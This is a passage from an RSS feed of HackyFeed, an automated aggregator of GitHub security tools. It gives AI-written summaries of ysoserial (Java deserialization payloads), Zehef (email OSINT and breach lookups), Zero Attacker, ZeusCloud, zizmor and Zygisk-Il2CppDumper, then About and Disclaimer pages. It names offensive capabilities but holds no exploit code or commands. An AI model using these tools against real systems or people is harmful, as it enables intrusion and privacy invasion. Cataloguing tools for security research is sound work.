&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ysoserial is a proof-of-concept tool designed to generate payloads for exploiting vulnerabilities related to unsafe Java object deserialization. It includes a collection of property-oriented programming &amp;ldquo;gadget chains&amp;rdquo; for various Java libraries, allowing users to execute arbitrary commands on an application host when deserialization occurs under vulnerable conditions. Notable features include support for multiple payload types and compatibility with various Java libraries, making it a versatile tool for security researchers focusing on Java application vulnerabilities.&lt;/p&gt;</description></item><item><title>Zehef</title><link>https://rainmana.github.io/hackyfeed/tools/n0rz3-zehef/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/n0rz3-zehef/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Zehef is an OSINT tool designed to gather public information on targeted email addresses. Its primary use case includes checking if an email is associated with any data breaches, pastes on platforms like Pastebin, and identifying linked social media accounts across various services. Notable features include email combination generation and integration with breach detection services like HudsonRock.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center" id="title"&gt;Z e h e f&lt;/h1&gt;&lt;br&gt;
&lt;p&gt;&lt;img src="assets/zehef_logo.png" alt=""&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.10%2B-brightgreen" alt="python version"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/gpl-3.0.fr.html"&gt;&lt;img src="https://img.shields.io/badge/License-GNU-blue.svg" alt="license"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="zehef-is-an-osint-tool-who-studies-the-emails-"&gt;&lt;strong&gt;Zehef is an osint tool who studies the emails 📩&lt;/strong&gt;&lt;/h1&gt;
&lt;h1 id="abouts-zehef"&gt;&lt;strong&gt;😇 Abouts zehef&lt;/strong&gt;&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;Zehef v2 is a tool focused on finding public information on a targeted email.&lt;/p&gt;</description></item><item><title>Zero-attacker</title><link>https://rainmana.github.io/hackyfeed/tools/asjadoooo-zero-attacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/asjadoooo-zero-attacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Zero Attacker is a suite of ethical hacking tools designed for penetration testing and includes both free and paid advanced tools. It offers a user-friendly interface for quick setup and execution via Python, with additional features available upon request through their Discord server. The tool emphasizes community engagement and support, aiming to facilitate a comprehensive hacking experience for users.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h3 id="zero-attacker"&gt;Zero Attacker&lt;/h3&gt;
&lt;p&gt;launching new version beta testing is here add me on discord .asjad asap&lt;/p&gt;</description></item><item><title>ZeusCloud</title><link>https://rainmana.github.io/hackyfeed/tools/zeus-labs-zeuscloud/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zeus-labs-zeuscloud/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ZeusCloud is an open-source cloud security platform designed to discover, prioritize, and remediate security risks across AWS environments. Its notable features include asset inventory creation, attack path discovery, graphical visualization of risks, customizable security controls, and comprehensive remediation guides, all aligned with compliance standards such as PCI DSS and CIS benchmarks. This tool addresses the complexities and challenges of securing expanding cloud workloads with user-friendly and actionable insights.&lt;/p&gt;</description></item><item><title>zizmor</title><link>https://rainmana.github.io/hackyfeed/tools/zizmorcore-zizmor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zizmorcore-zizmor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;zizmor&lt;/code&gt; is a static analysis tool designed specifically for GitHub Actions, aimed at identifying common security vulnerabilities within CI/CD workflows. It detects issues such as template injection vulnerabilities, accidental credential leakage, excessive permission grants, and misleading &lt;code&gt;git&lt;/code&gt; references, among others. The tool&amp;rsquo;s primary use case is to enhance the security posture of automated workflows by providing insights and recommendations for remediation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-zizmor"&gt;🌈 zizmor&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://zizmor.sh/"&gt;&lt;img src="https://img.shields.io/badge/%F0%9F%8C%88-zizmor-white?labelColor=white" alt="zizmor"&gt;&lt;/a&gt;
&lt;a href="https://github.com/zizmorcore/zizmor/actions/workflows/ci.yml"&gt;&lt;img src="https://github.com/zizmorcore/zizmor/actions/workflows/ci.yml/badge.svg" alt="CI"&gt;&lt;/a&gt;
&lt;a href="https://crates.io/crates/zizmor"&gt;&lt;img src="https://img.shields.io/crates/v/zizmor" alt="Crates.io"&gt;&lt;/a&gt;
&lt;a href="https://repology.org/project/zizmor/versions"&gt;&lt;img src="https://repology.org/badge/tiny-repos/zizmor.svg" alt="Packaging status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/sponsors/woodruffw"&gt;&lt;img src="https://img.shields.io/github/sponsors/woodruffw?style=flat&amp;amp;logo=githubsponsors&amp;amp;labelColor=white&amp;amp;color=white" alt="GitHub Sponsors"&gt;&lt;/a&gt;
&lt;a href="https://discord.com/invite/PGU3zGZuGG"&gt;&lt;img src="https://img.shields.io/badge/Discord-%235865F2.svg?logo=discord&amp;amp;logoColor=white" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; is a static analysis tool for GitHub Actions.&lt;/p&gt;</description></item><item><title>Zygisk-Il2CppDumper</title><link>https://rainmana.github.io/hackyfeed/tools/perfare-zygisk-il2cppdumper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/perfare-zygisk-il2cppdumper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Zygisk-Il2CppDumper is a tool designed for dumping IL2CPP data at runtime while leveraging Zygisk to effectively bypass various protections, encryptions, and obfuscations. Its primary use case is for developers and security researchers needing to extract and analyze IL2CPP binaries from Android applications. Notable features include its compatibility with Magisk, flexible installation methods, and the ability to automate the dumping process through GitHub Actions or Android Studio.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="zygisk-il2cppdumper"&gt;Zygisk-Il2CppDumper&lt;/h1&gt;
&lt;p&gt;Il2CppDumper with Zygisk, dump il2cpp data at runtime, can bypass protection, encryption and obfuscation.&lt;/p&gt;</description></item><item><title>About</title><link>https://rainmana.github.io/hackyfeed/pages/about/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/pages/about/</guid><description>&lt;h2 id="about-hackyfeed"&gt;About HackyFeed&lt;/h2&gt;
&lt;p&gt;HackyFeed is a community-driven cybersecurity tools aggregator, inspired by &lt;a href="https://www.kitploit.com"&gt;KitPloit&lt;/a&gt; which went offline in 2025.&lt;/p&gt;
&lt;p&gt;The goal is simple: &lt;strong&gt;make it easy to discover new and useful cybersecurity tools from GitHub.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="how-it-works"&gt;How It Works&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;A Go CLI tool queries the GitHub API daily for repositories tagged with security-related topics (pentesting, exploit, red-team, OSINT, etc.)&lt;/li&gt;
&lt;li&gt;New discoveries are stored in a local SQLite database&lt;/li&gt;
&lt;li&gt;An AI pipeline (via LiteLLM) reads each tool&amp;rsquo;s README and generates a concise summary&lt;/li&gt;
&lt;li&gt;Hugo renders the summaries into this static site&lt;/li&gt;
&lt;li&gt;GitHub Actions deploys it automatically&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="sources"&gt;Sources&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;GitHub Topics&lt;/strong&gt;: pentesting, exploit, red-team, offensive-security, OSINT, vulnerability-scanner, bug-bounty, and more&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href="https://github.com/rainmana/awesome-rainmana"&gt;awesome-rainmana&lt;/a&gt;&lt;/strong&gt;: A curated list of starred GitHub repositories&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="open-source"&gt;Open Source&lt;/h3&gt;
&lt;p&gt;HackyFeed is fully open source under the MIT License. The entire pipeline — from data collection to site generation — is available at &lt;a href="https://github.com/rainmana/hackyfeed"&gt;github.com/rainmana/hackyfeed&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>Disclaimer</title><link>https://rainmana.github.io/hackyfeed/pages/disclaimer/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/pages/disclaimer/</guid><description>&lt;h2 id="legal-disclaimer"&gt;Legal Disclaimer&lt;/h2&gt;
&lt;p&gt;HackyFeed is an &lt;strong&gt;automated aggregator&lt;/strong&gt; of publicly available cybersecurity tools hosted on GitHub. By using this site, you acknowledge and agree to the following:&lt;/p&gt;
&lt;h3 id="no-endorsement"&gt;No Endorsement&lt;/h3&gt;
&lt;p&gt;HackyFeed does not endorse, recommend, or vouch for any of the tools listed on this site. Inclusion of a tool does not imply approval of its functionality, safety, or legality. Tools are listed solely because they are publicly available on GitHub and tagged with relevant cybersecurity topics.&lt;/p&gt;</description></item></channel></rss>